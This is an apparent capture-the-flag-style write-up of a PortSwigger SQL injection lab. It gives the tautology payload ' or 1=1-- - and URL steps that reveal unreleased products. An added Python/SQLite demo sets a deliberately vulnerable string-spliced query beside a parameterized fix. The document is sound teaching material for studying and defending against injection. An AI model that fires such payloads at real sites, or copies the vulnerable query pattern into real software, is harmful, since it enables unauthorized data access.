# Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

## [Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data)

**This lab contains an** [**SQL injection**](https://portswigger.net/web-security/sql-injection) **vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:**

```sql
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
```

**To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.**

### Solution:

Payload:

```sql
' or 1=1-- -
```

Resulting query:

```sql
SELECT * FROM products WHERE category = '' or 1=1-- -' AND released = 1
```

The leading quote closes the string literal, `or 1=1` makes the `WHERE` clause true for every row, and `-- ` turns the rest of the statement (including `AND released = 1`) into a comment, so the unreleased products are no longer filtered out.

### Steps:

1. Visit: <https://YOUR-SESSION.web-security-academy.net/filter?category=Accessories>
2. Insert a single quote (`'`) at the end of the category value: `https://YOUR-SESSION.web-security-academy.net/filter?category=Accessories'`
3. The application returns an internal server error, because the unbalanced quote breaks the query syntax.
4. Inject the tautology payload to retrieve both released and unreleased products.
5. `https://ac631f881eeeb165c0bf17e90011009b.web-security-academy.net/filter?category=Accessories' or 1=1-- -`
6. <figure><img src="https://3344169606-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjoHbOFRbwrmbD6PvIUkf%2Fuploads%2FdsrwRZWApHmQMDzTjkHP%2Fimage.png?alt=media&#x26;token=79d37cac-7d52-498b-a251-af92012c8fe4" alt=""><figcaption></figcaption></figure>
7. <figure><img src="https://3344169606-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjoHbOFRbwrmbD6PvIUkf%2Fuploads%2FjmedbBnWQyqGsBggTv7g%2Fimage.png?alt=media&#x26;token=0ff652c4-399d-4307-9956-344d477db6e9" alt=""><figcaption></figcaption></figure>
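The following added example (not PortSwigger's lab code) reproduces the three behaviours seen in the steps above with an in-memory SQLite table: the normal filter, the syntax error caused by a stray quote, and the tautology payload bypassing `released = 1`. It then shows the fix, a parameterized query, where the same input is treated as a literal category name and matches nothing. The `products` rows, `handle_request` and the two `filter_*` functions are constructed for this illustration.

```python
import sqlite3

# Constructed sample catalogue; the lab's real data is not known.
PRODUCTS = [
    ("Gifts", "Mug", 1),
    ("Gifts", "Secret Gift", 0),
    ("Accessories", "Hat", 1),
    ("Accessories", "Unreleased Hat", 0),
]


def make_db():
    """Build an in-memory table shaped like the lab's products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (category TEXT, name TEXT, released INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def filter_vulnerable(conn, category):
    """Mirrors the lab: the category parameter is spliced into the SQL text."""
    sql = f"SELECT name FROM products WHERE category = '{category}' AND released = 1"
    return [row[0] for row in conn.execute(sql)]


def filter_parameterized(conn, category):
    """Hardened version: the value is bound, never parsed as SQL."""
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(sql, (category,))]


def handle_request(conn, category, query_fn):
    """Simulates the /filter endpoint: a query that fails to parse becomes a 500."""
    try:
        return 200, query_fn(conn, category)
    except sqlite3.OperationalError:
        return 500, []


if __name__ == "__main__":
    db = make_db()
    for value in ["Accessories", "Accessories'", "Accessories' or 1=1-- -"]:
        print("vulnerable   ", repr(value), handle_request(db, value, filter_vulnerable))
        print("parameterized", repr(value), handle_request(db, value, filter_parameterized))
```

With the vulnerable function the lone quote yields a 500 (step 3) and the tautology payload returns every product regardless of `released`; with the bound parameter both inputs are simply categories that do not exist, so the query returns no rows and the `released = 1` condition can never be commented away.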
